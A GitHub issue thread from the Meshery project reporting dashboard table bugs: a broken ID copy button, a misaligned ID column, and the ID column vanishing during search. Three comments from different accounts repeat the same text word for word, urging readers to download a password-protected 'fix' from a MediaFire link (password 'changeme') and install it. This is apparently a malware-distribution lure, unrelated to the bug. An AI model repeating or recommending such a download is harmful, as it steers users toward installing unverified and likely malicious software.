### ISSUE TITLE
[UI] Bugs on dashboard page tables

### ISSUE THREAD

**Issue by amitamrutiya** [meshery/meshery#11807]
There are some bugs on the dashboard tables (Node, Namespace, Workload, Configuration, Network, Security, Storage tables):

- The copy button for the ID is not working.
- When the "Show ID" option is enabled, the ID column layout differs from other 
- The search results hide the visible ID column.

Desired Behavior

- The copy button should work correctly.
- The ID column should have the same layout as the other headers.
- The ID should remain visible while searching.

### Screenshots/Logs
![image](https://github.com/user-attachments/assets/f7064184-4d25-4f12-86d7-d166b93d12e6)

### Environment

- Browser: Chrome Safari Firefox
- Host OS: Mac Linux Windows
- Meshery Server Version: stable-v
- Meshery Client Version: stable-v
- Platform: Docker Kubernetes

---

### Contributor [Guides](https://docs.meshery.io/project/contributing) and [Handbook](https://layer5.io/community/handbook)

- 🎨 Wireframes and [designs for Meshery UI](https://www.figma.com/file/SMP3zxOjZztdOLtgN4dS2W/Meshery-UI) in Figma [(open invite)](https://www.figma.com/team_invite/redeem/qJy1c95qirjgWQODApilR9)
- 🖥 [Contributing to Meshery UI](https://docs.meshery.io/project/contributing/contributing-ui)
- 🙋🏾🙋🏼 Questions: [Discussion Forum](http://discuss.meshery.io) and [Community Slack](https://slack.meshery.io)

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
